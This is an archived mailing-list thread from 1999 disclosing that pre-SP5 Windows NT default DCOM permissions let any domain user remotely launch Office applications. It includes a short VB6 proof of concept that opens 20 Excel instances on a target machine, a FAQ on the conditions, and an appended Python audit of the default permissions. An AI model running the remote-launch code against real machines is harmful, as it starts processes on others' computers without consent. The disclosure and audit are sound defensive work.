Forwarding the followup from NTBUGTRAQ.

-----Original Message-----
From: Rob Lempke [mailto:rlempkeat_private]
Sent: Monday, August 23, 1999 6:13 AM
To: NTBUGTRAQat_private
Subject: Re: DCOM attack against NT using VB6

Sorry for the late response, but I was on vacation from August 14 - 22. I received about 75 e-mails on this post, so if you want to post this reply to the mailing list that would be great.

Long story short, the target (DCOM or server), which must be running the DCOM object (exe, not dll's or ocx's), must be Windows NT, sp3 or sp4, with the rpc service running and no TCP filters running. The client can be any win32 platform with DCOM installed. (DCOM comes with NT/98 but not 95.) The bug is that before service pack 5 (at least here) the Everyone group has DEFAULT ACCESS and LAUNCH permissions.

DCOM attack against NT using VB6 FAQ:

Q: Did you use a user that had permissions on target? Are you in the same domain?
A: The target and I are on the same domain, both as Users (with default user permissions, i.e. not ADMIN). I am an Everyone/Authenticated user from the target's point of view. I can see his/her shares.

Q: What were the Default DCOM permissions set to on the target?

Access:
    Interactive - Allow Access
    (This Machine)\Administrator - Allow Access
    System - Allow Access
    Everyone - Allow Access

Launch:
    Interactive - Allow Launch
    (This Machine)\Administrator - Allow Launch
    System - Allow Launch
    Everyone - Allow Launch

Configuration:
    Interactive
    (This Machine)\Administrator - full
    System - full
    Creator Owner - special
    Everyone - read

Q: What versions of VB and Excel were used?
A: I am using VB6, a must to get the CreateObject with the system parameter. It works with both Word and Excel ver 97 and 2000.

Q: What apps use the Default permissions?
A: Any that do not provide their own, which seems to be most. This includes Office.

Q: Can I do this with an ActiveX control?
A: NO, DCOM objects are ActiveX exe's. This does not work with ActiveX dll's components in MTS.

Q: Does this work with Service Pack 5? Why not?
A: No, because the Everyone group is removed from the default Access (allow) and Launch (allow) permissions groups in DCOMCNFG.

Q: Did you modify the access or launch permissions on the target? Were you logged in to the target machine? Did you have an account on that machine?
A: No, No and No.

-----Original Message-----
From: Windows NT BugTraq Mailing List [mailto:NTBUGTRAQat_private] On Behalf Of Rob Lempke
Sent: Wednesday, August 11, 1999 3:27 PM
To: NTBUGTRAQat_private
Subject: DCOM attack against NT using VB6

Using the code below I was able to create 20 instances of Excel on my co-workers' machines without modifying their machines at all. The target must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to prevent the attack.

    Private Sub Command1_Click()
        Dim xlObj As Object
        Dim xlCollection As New Collection
        Dim i As Long

        For i = 1 To 20
            Set xlObj = CreateObject("Excel.Application", "\\NTBox")
            xlCollection.Add xlObj
        Next i

        i = 1
        'clean up
        While xlCollection.Count > 0
            xlCollection.Remove (xlCollection.Count)
        Wend
        Set xlCollection = Nothing
    End Sub

-Robert E. Lempke
--------------------------------------------
Steven Wright one-liners:
"Black holes are where God divided by zero."
"Quantum Mechanics: The dreams stuff is made of."
"Early bird gets the worm, but the second mouse gets the cheese."
"If everything seems to be going well, you have obviously overlooked something."
"Join the Army, meet interesting people, kill them."
"Success always occurs in private, and failure in full view."
"Ambition is a poor excuse for not having enough sense to be lazy."
"Hard work pays off in the future. Laziness pays off now."
"Everyone has a photographic memory. Some don't have film."
"Drink until she's cute, but stop before the wedding."
--------------------------------------------
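
The thread attributes the problem to Everyone appearing in the machine-wide default DCOM Access and Launch permissions. The following is an added example, not part of the original posts: a small Python audit that parses a self-relative security descriptor and reports whether it carries an allow entry for Everyone (S-1-1-0). It assumes the descriptor bytes have already been exported from the REG_BINARY values DefaultLaunchPermission / DefaultAccessPermission under HKLM\SOFTWARE\Microsoft\Ole; the two sample descriptors are constructed here to mirror the pre-SP5 and SP5 lists described above, and all function names are hypothetical.

```python
import struct

EVERYONE = "S-1-1-0"   # well-known World (Everyone) SID
ALLOW, DENY = 0, 1     # ACCESS_ALLOWED_ACE_TYPE, ACCESS_DENIED_ACE_TYPE

def parse_sid(buf, off):
    """Decode the binary SID at buf[off:] into S-R-A-S... string form."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "-".join(["S", str(rev), str(authority)] + [str(s) for s in subs])

def dacl_aces(sd):
    """Return [(type, mask, sid)] for a self-relative descriptor, or None if it has no DACL."""
    dacl_off = struct.unpack_from("<BBHIIII", sd, 0)[6]
    if dacl_off == 0:
        return None
    ace_count = struct.unpack_from("<BBHHH", sd, dacl_off)[3]
    off, aces = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, size = struct.unpack_from("<BBH", sd, off)
        if size < 8 or off + size > len(sd):
            raise ValueError("malformed ACE at offset %d" % off)
        if ace_type in (ALLOW, DENY):   # other ACE types use a different layout
            mask = struct.unpack_from("<I", sd, off + 4)[0]
            aces.append((ace_type, mask, parse_sid(sd, off + 8)))
        off += size
    return aces

def everyone_allowed(sd):
    """True if the DACL is missing (unrestricted) or holds an allow ACE for Everyone."""
    aces = dacl_aces(sd)
    return aces is None or any(t == ALLOW and s == EVERYONE for t, _m, s in aces)

# --- constructed sample descriptors (not exported from a real machine) ---
def sid_bytes(authority, *subs):
    head = struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
    return head + struct.pack("<%dI" % len(subs), *subs)

def build_sd(aces):
    body = b"".join(struct.pack("<BBHI", t, 0, 8 + len(s), m) + s for t, m, s in aces)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(body), len(aces), 0) + body
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl   # self-relative, DACL present

# Mask 1 is COM_RIGHTS_EXECUTE; SIDs are Interactive, Local System and Everyone.
INTERACTIVE, SYSTEM, WORLD = sid_bytes(5, 4), sid_bytes(5, 18), sid_bytes(1, 0)
PRE_SP5 = build_sd([(ALLOW, 1, INTERACTIVE), (ALLOW, 1, SYSTEM), (ALLOW, 1, WORLD)])
POST_SP5 = build_sd([(ALLOW, 1, INTERACTIVE), (ALLOW, 1, SYSTEM)])
if __name__ == "__main__":
    for name, sd in (("pre-SP5 style", PRE_SP5), ("post-SP5 style", POST_SP5)):
        print(name, "-> Everyone allowed:", everyone_allowed(sd))
```

A descriptor that reports True here leaves the default permissions open in the way the FAQ describes; per-application permissions set in DCOMCNFG are stored separately and are not covered by this check.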
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:29 PDT